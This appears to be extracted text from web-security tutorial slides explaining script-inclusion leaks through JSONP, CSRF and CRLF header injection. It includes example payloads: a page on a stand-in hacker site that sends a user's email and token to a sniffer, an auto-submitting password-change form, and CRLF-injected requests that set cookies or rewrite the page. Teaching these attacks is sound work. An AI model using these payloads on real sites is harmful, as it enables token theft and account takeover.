  • 20. Example 1 var user_mail = 'user@test.com'; var secret_token = '63a9f0ea7bb98050796b649e85481845'; ... social.net/me.js <script src="//social.net/me.js"></script> <script> send_to_sniffer(user_mail+':'+secret_token); </script> hacker.me/test.htm Dynamic content with user's data Hacker's fake site with payload logged in social.net users Now JS can access this vars and send them to hacker's log!
  • 21. Example 2: JSONP pewpew({"name":"user@test.com", "secret_token" : "63a9f0ea7bb98050796b649e85481845"}) social.net/me.php?cb=pewpew Same as example 1 with JSONP
  • 22. Example 2 pewpew({"name":"user@test.com", "secret_token" : "63a9f0ea7bb98050796b649e85481845"}) social.net/me.php?cb=pewpew <script> pewpew = function(i){ send_to_sniffer(i.name+i.secret_token); } </script> <script src="//social.net/me.php?cb=pewpew"> </script> hacker.me/test.htm Write your own function!
  • 24. WTF is "CSRF"? <body onload="document.forms[0].submit()"> <form method="GET" action="//social.net/settings"> <input name="type" value="password"> <input name="pass" value="qwerty123"> </form> ... hacker.site/1.html GET /settings?type=password&pass=qwerty123 HTTP/1.1 Host: social.net Cookie: username=user1; ... ...
  • 25. CSRF attack plan • Server has no uniq tokens per request/user/ session and no "referer" checks • Create form with filled inputs and autosubmit • Gave link to authenticated user • He opens link, form submits and browser make crafted by hacker request
  • 26. CSRF example Real-life example. CSRF in password change processing
  • 27. HTTP Response Splitting or CRLF injection
  • 28. WTF is "CRLF"? CR - Carriage Return LF - Line Feed CRLF means end-of-line in HTTP packets CRLF in bytes - %0d%0a or rn POST / HTTP/1.1[CRLF] Host: www.example.com[CRLF] User-Agent: Mozilla/5.0[CRLF] Accept: text/html[CRLF] Accept-Language: en-us,en;q=0.5[CRLF] Accept-Encoding: gzip, deflate[CRLF] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7[CRLF] Connection: keep-alive[CRLF][CRLF] data=pawpaw Typical HTTP request:
  • 29. WTF is "CRLF"? CR - Carriage Return LF - Line Feed CRLF means end-of-line in HTTP packets CRLF in bytes - %0d%0a or rn HTTP/1.1 200 OK[CRLF] Host: www.example.com[CRLF] Connection: close[CRLF] X-Powered-By: PHP/5.5.31[CRLF] Content-type: text/html[CRLF][CRLF] page<h1>content</h1>here Typical HTTP response:
  • 30. WTF is "CRLF"? What if we can inject in HTTP headers? GET /?content_type=text/html HTTP/1.1 Host: 127.0.0.1:8081 ... HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.11 Content-type: text/html <html> ...
  • 31. WTF is "CRLF"? Modify headers as you want, add new header for example: GET /?content_type=text/html%0d%0aSet-Cookie: a=b; HTTP/1.1 Host: 127.0.0.1:8081 ... HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.11 Content-type: text/html Set-Cookie: a=b <html> ... [CRLF]
  • 32. WTF is "CRLF"? Just add double [CRLF] to rewrite page content! GET /?content_type=text/html%0d%0a%0d%0a<h1>1<!-- HTTP/1.1 Host: 127.0.0.1:8081 ... HTTP/1.0 200 OK Server: BaseHTTP/0.3 Python/2.7.11 Content-type: text/html <h1>1<!-- <html> [CRLF][CRLF]